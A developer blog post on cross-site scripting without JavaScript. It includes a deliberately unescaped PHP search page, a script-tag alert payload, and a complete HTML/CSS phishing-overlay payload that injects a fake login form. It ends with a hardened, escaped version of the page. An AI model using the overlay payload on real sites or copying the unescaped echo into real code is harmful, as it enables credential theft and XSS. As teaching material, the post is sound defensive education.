Wednesday 9 December 2020

Cross-site Scripting Without JavaScript

It has been said that in order to guard against Cross-site Scripting (XSS), a developer needs to be wary of JavaScript being executed in content displayed on the website. That's certainly true, but inadequate. XSS is not only about malicious JavaScript being executed in a website via HTML injection. There are plenty of avenues to attack via HTML injection without the use of JavaScript.

To illustrate what I'm saying, here's a sample search page in PHP with a bit of Lorem Ipsum. It has not been protected against XSS.
<!DOCTYPE html>
<html>
    <head>
        <title>XSS test</title>
    </head>
    <body>
        <?php
        if (isset($_POST["search"]))
        {
            // Unescaped output: the raw input is written straight into the page's HTML.
            // This line is the XSS sink the rest of the post exploits.
            echo "You searched for: " . $_REQUEST["search"];
        }
        ?>
        <form method="POST">
            Search:
            <input name="search" placeholder="Enter search terms here...">
            <input type="submit" value="Search">
        </form>

        <p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nam a justo metus. Integer semper eros ligula, ut porta neque feugiat et. Aenean at sem iaculis, tempus libero non, blandit augue. Phasellus eu dolor ac lacus congue rhoncus. Aliquam tempor, dolor vel porta fermentum, arcu tellus vestibulum turpis, sed condimentum enim lectus ut ligula. Maecenas id consectetur enim, a rutrum risus. Donec tempor ornare viverra. Ut bibendum nunc ac ligula rhoncus, quis rhoncus augue tempus. Mauris vulputate tempor diam, vitae mattis ligula lacinia sit amet.</p>

        <p>Praesent ac turpis pretium, pretium augue ullamcorper, consequat diam. Vestibulum vehicula scelerisque luctus. Nulla eget sollicitudin urna, in consectetur sem. Vestibulum vel tortor libero. Nunc maximus leo non urna cursus, vitae suscipit est gravida. Aliquam ac vulputate ligula. Sed et congue ligula. Phasellus nec imperdiet augue, in aliquam arcu. Sed mollis eleifend leo et tincidunt. Curabitur scelerisque dolor id mi commodo volutpat. Nam quis lacinia neque, at imperdiet augue.</p>

        <p>In odio ex, gravida in dolor quis, commodo tempus dui. Donec egestas felis sit amet tortor pretium convallis. Aliquam ultrices, nulla eget pellentesque hendrerit, lectus arcu varius orci, finibus congue sapien magna id dolor. Vestibulum neque dolor, cursus sit amet nulla in, feugiat sagittis risus. Cras facilisis bibendum pulvinar. Integer finibus aliquam ipsum, in commodo lorem placerat non. Interdum et malesuada fames ac ante ipsum primis in faucibus. Donec et magna at dolor scelerisque consequat pharetra a nisi. Morbi viverra sapien lorem, eget venenatis diam auctor ultrices. Duis congue felis mattis egestas mollis. Duis aliquam turpis nisi, sit amet rutrum nibh sodales eget.</p>

        <p>Vestibulum eget dolor urna. Pellentesque nisi risus, tincidunt pretium ultricies eget, semper sed est. Mauris egestas, metus sit amet porta fringilla, ipsum magna rhoncus arcu, at iaculis lacus ligula quis turpis. Morbi vitae efficitur nulla. Pellentesque elementum, justo quis dignissim dapibus, eros est faucibus erat, sollicitudin lacinia felis justo nec lacus. Morbi vitae lobortis enim. Phasellus metus nibh, fermentum non lacinia non, tempus sit amet ipsum. Aenean sollicitudin egestas lobortis. Integer dictum ultricies dui a facilisis. Praesent augue augue, porta vel eros et, congue porttitor ipsum. Phasellus hendrerit felis purus, vitae facilisis enim auctor eu. Integer laoreet dapibus sodales. </p>

        <p>Vestibulum pellentesque hendrerit convallis. Curabitur tempor at odio quis tristique. Phasellus accumsan quam et sem pellentesque tempus. Donec non arcu sed risus vehicula efficitur eu at est. Ut vestibulum et nisi sed malesuada. Nunc mattis egestas nulla, nec malesuada sapien tempor a. Aenean ullamcorper nulla id lacus varius pulvinar. Ut vitae nisl fermentum, sagittis magna sed, ultricies enim. Nunc et ante id felis varius ultrices. Ut sit amet diam dapibus, bibendum risus sed, posuere urna. Maecenas eleifend ante non imperdiet efficitur. Sed vel nisl quis lorem commodo varius ut faucibus quam. Suspendisse placerat accumsan quam, in malesuada tellus. Integer quam augue, feugiat vel neque eget, pretium ultrices mi. Vestibulum a sollicitudin est. </p>
    </body>
</html>


When you run this, it takes the string entered and displays it - a big XSS no-no.

XSS with JavaScript

Running with the example above, let's try using a script tag in the input.

<script>alert('xss attack!')</script>


Right now, it's a simple alert() function being run; but what happens if it actually does something terrible?

XSS without JavaScript

You might be thinking - let's just disable JavaScript; problem solved! In this day and age, disabling JavaScript has the undesirable effect of crippling the user interface to the point where usability is greatly diminished. In business terms, this is impractical and utterly unacceptable.

And, as mentioned, strange as it may sound, you can still carry out XSS without JavaScript.

Try entering this string. Note that there are no script tags in it - only a form tag.
<div style="font-family:verdana;width:100%;height:100%;position:fixed;left:0;top:0;right:0;bottom:0;background-color:rgba(0,0,0,0.8);"><br /><br /><br /><br /><div style="width:600px;height:auto;background-color:rgba(255,255,255,1);border-radius:20px;padding:20px;margin:0 auto 0 auto"><h3 style="color:red;text-align:center">Warning</h3><h4>You have been logged out of the system for security reasons. Someone may be attempting to steal your password. To regain control over your credentials, please log in again. </h4><form method="POST" action="http://www.teochewthunder.com"><table width="100%"><tr><td><label>ID:</label></td><td><input type="text"></td></tr><tr><td><label>Password:</label></td><td><input type="password"></td></tr><tr><td></td><td><button type="submit" style="width:100px;height:30px;color:white;font-weight:bold;background-color:rgba(50,50,255,1);border-radius:50px">Login</button></td></tr><tr><td></td><td></td><td><small><i>Symphonetic Security Systems &copy; 2020</i></small></td></tr></table></form></div></div>


And whoosh! Now when the page is run, it pops up an overlay with an official-looking form asking the user to log in with his or her username and password. It's a combination of Social Engineering and Phishing. Again, no JavaScript was run here - it was all purely HTML and CSS.

If you submit the form, right now, all it does is go to www.teochewthunder.com. But what if it redirected the user to somewhere way more sinister, where the username and password were now stored for nefarious purposes?

In conclusion...

XSS is not about JavaScript.

It's not just JavaScript that a developer has to look out for. In the example given, it wasn't just that the input was not sanitized against malicious JavaScript - it wasn't sanitized against HTML tags, period. The input text length was not restricted.

It's time to stop thinking of XSS as a JavaScript attack, and more as HTML injection.
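Here is the same search page with the hole closed. This is an added example, not the post's own code: the output is escaped with htmlspecialchars() so an injected form tag is rendered as literal text, the input length is capped on both the client and the server, and a Content-Security-Policy form-action header is sent so that even a missed escape could not produce a form that posts to another origin. The 100-character limit and the h() helper name are assumptions.

```php
<?php
// Added example (not the original post's code): hardened version of the search page.

// Defence in depth (assumed policy): form-action 'self' makes the browser refuse to
// submit any form on this page to a different origin, which is exactly what the
// injected phishing form relied on. Headers must be sent before any output.
header("Content-Security-Policy: form-action 'self'");

// Escape untrusted text for an HTML body or attribute context.
// ENT_QUOTES also escapes single quotes, so the result is safe inside quoted attributes;
// ENT_SUBSTITUTE replaces invalid UTF-8 instead of returning an empty string.
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

$search = $_POST["search"] ?? null;

// Server-side length limit (assumed value); the maxlength attribute below is only a
// convenience for the browser and can be bypassed by any client.
if ($search !== null && strlen($search) > 100) {
    $search = substr($search, 0, 100);
}
?>
<!DOCTYPE html>
<html>
    <head>
        <title>XSS test</title>
    </head>
    <body>
        <?php if ($search !== null): ?>
            <!-- Escaped: "<div style=..." now displays as text instead of becoming markup -->
            You searched for: <?= h($search) ?>
        <?php endif; ?>
        <form method="POST">
            Search:
            <input name="search" maxlength="100" value="<?= h($search ?? '') ?>" placeholder="Enter search terms here...">
            <input type="submit" value="Search">
        </form>
    </body>
</html>
```

Submitting the overlay payload from the post to this version prints it back as plain text, and the browser's console reports a blocked form submission if a form ever does slip through with a foreign action.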

<script>alert("I hope this has been useful!");</script>
T___T
